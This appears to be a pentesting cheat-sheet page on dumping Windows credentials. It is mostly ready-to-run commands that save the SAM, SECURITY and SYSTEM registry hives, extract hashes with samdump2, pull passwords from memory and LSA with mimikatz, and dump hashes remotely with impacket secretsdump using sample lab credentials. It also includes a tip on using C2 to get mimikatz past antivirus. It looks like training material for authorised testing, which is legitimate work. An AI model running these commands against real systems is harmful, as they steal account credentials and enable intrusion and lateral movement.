Credentials dumping

Manual query registry keys

Windows Local credentials hashes - SAM, SECURITY, SYSTEM

Note: Needs to be Local Admin on the target system to get able to dump the registery keys. 

reg save hklm\system system
reg save hklm\sam sam
reg save hklm\security security

Then, use samdump2 or impacket to extract the hashes

samdump2

Extracting local hashes. System and SAM files have been previously found on the Windows target system. 

samdump2 system sam

Mimikatz

Note: Need to have a Local Admin account on the target system.

Mimikatz is very likely to be detected by AV and others protection measures. Using C2 can help obfuscate mimikatz.

Dump SAM credentials in a file named hash.txt

privilege::debug
token::elevate
log hash.txt
lsadump::sam sam.hiv security.hiv

Dump credentials in memory (logged in users)

privilege::debug
SEKURLSA::LogonPasswords

Dumping credentials from LSA (Local Security Authority)

lsadump::lsa /patch

Impacket - secretsdump.py

Will dump all the hashes from the SAM remotely

root@kali# secretsdump.py marvel/fcastle:password1@192.168.57.142

Information

LM:NT can have null part.

Null LM part:

PreviousResourcesNextUAC Bypassing

Last updated